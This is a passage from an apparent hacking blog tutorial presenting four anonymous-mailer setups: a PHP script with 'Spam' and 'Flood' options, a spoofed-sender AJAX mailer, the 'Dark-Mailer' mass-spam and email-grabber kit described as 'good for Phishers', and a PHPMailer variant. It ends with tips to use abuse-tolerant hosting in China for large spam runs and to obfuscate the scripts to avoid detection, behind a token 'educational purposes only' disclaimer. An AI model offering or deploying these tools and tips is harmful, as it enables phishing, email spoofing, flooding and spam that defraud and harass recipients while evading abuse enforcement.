<textarea name='msg' rows='10' cols='30'></textarea><br><br><input type='submit'>
</form>
<? }
} else { 
?><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Send simple message</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Spam</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Flood</a><br>
<? ?>

Installation
It's very easy. Just save the script above as mail.php and copy it to the server (via FTP or cPanel's File Manager) into your public_html dir and begin to send mails. Type in your browser for example <your_subdomain_name>.x10.bz/<yourfile.php>

[Image: b0662289.jpg]


Screen


[Image: 214834c5.jpg]

Method #2


What you will need

1) Host with PHP and Sendmail support (for example x10hosting.com).
2) AJAX project email.rl6.ru (Anonymous Mail).
(Source code was taken from http://email.rl6.ru, Author of project: sterx@rl6.ru with support LiveDev Group, GPL license)

Features of the project

- Using UTF8 (you can use any characters in your messages)
- Using HTML и TXT/plain formats
- You can send letters with any return address
- Supports attachments
- Using AJAX without page reloading

Installation
It's very easy. Just decompress and copy files to the server (via FTP or cPanel's File Manager) and begin to send messages.

Screen


[Image: 9728a94c.jpg]

Download:

HFthebest

Method #3


What you will need

1) Host with PHP and Sendmail support
2) Dark-Mailer V.2.2 © by p0LYM0rPH2012 and ZyphoMud DarkenedCore Admin Team

Features of the project

- Anonymous mailing
- Spam massmailing
- Mail grabber alpha-version
- Using HTML и TXT/plain formats
- Supports attachments

Installation
Copy file Dark-Mailer V.2.2.htm (better rename it) to the server (via FTP or cPanel's File Manager) and begin to send messages.

Screen


[Image: b20fd886.jpg]

How to use

Simply fill out the form and press the "Send"-Button. You can attach a file, which will be uploaded to the server, encoded for the Email and then be deleted from the server(If PHP Safe-Mode is not active). If you wish, you can spam around by inserting a lot of Email-Adresses and let the script pass through this list about 1000 times ;). The PHP execution time depends if Safe-Mode's on! If you type "{email}" in the "Subject" or "Message" field the script will exchange it with the Email-Adresse you typed in the "Your Email" field. You can set the Email to a plain text Email or a HTML-Email (with or without parsing BBCodes)...good for Phishers ;)
Supported BBCode Tags:
Quote:b,i,u,center,img,url,red,blue,yellow,color,size,quote,quote=
Now you can try out the new E-Mail Grabber. Type an URL and the Grabber will search for E-Mails on the site. The Grabber is Alpha.

Download:


Method #4


What you will need

1) The script requires host with PHP 5 support - because of the function call htmlspecialchars_decode, you need to turn "back to HTML" received from TinyMCE data. Of course, writing your analogue of this function, can use the script and the previous versions of PHP. The file "time" should be writable.
2) PHPMailer script.
Source code was taken from http://Pers.narod.ru and translated from Russian to English

Features of the project

Presented script, in fact, is simply "cheat" over a similar function call mail. To write and edit messages in HTML format, it uses the excellent (about 1.5 Mb in the decompressed state) library TinyMCE, plus contains several additional features for validating input data, set limits on the time between retry, etc. This script allows you to create the message body in a WYSIWYG-editor, like an ordinary Microsoft Word, and send the letter as plain text (the switch to the right of the button "Reset"). Time to re-send, as well as restrictions on the maximum message size and the maximum length of words are set in config.php. After sending letters to the script leaves a letter in the form and allows you, after you specify the number of seconds, send again. I think it is easy to add to post.php a few lines of code to send out a letter on the list of addresses stored in a text file. This version of the script does not requires MySQL. Attaching a file to a letter in this version of the script is not available, but you can embed links to external resources, including graphics. If you want full support for attachments - add to library TinyMCE modules MCFileManager and MCImageManager, configure them and place on the host. The official website of these modules are invited to buy, but if a little try, you can find anyway.

Installation
It's very easy. Just decompress and copy files to the server (via FTP or cPanel's File Manager) and begin to send messages. To send message you must enter correct digital number.

Screen


[Image: 1ff9d93d.jpg]

Download:

HFthebest

Small advices will help you

1) If you want to send a LARGE amount spam or fake messages you will be quickly suspended or banned.
Use abuse stable hosting providers located in China!

2) Always scramble the php scripts
[TuT] How to make your PHP Scripts FUD

3) Always password protect via cPanel your directory with php scrips from n00bs and script kiddies.

[Image: e4b68647.jpg]

WARNING: ALL THE INFORMATION PROVIDED IN THIS POST ARE FOR EDUCATIONAL PURPOSES ONLY. I AM NOT RESPONSIBLE FOR ANY MISUSE.

Please leave a comment on what you thought of these usefull scripts!
Save the energy! Switch off Caps Lock! Biggrin
I tried my best to write this tutorial!

Enjoy!

0 comments:

Copyright © 2013 hacking-guru. by Bloggertheme9 Powered by Blogger.
WP Theme-junkie converted by Blogger template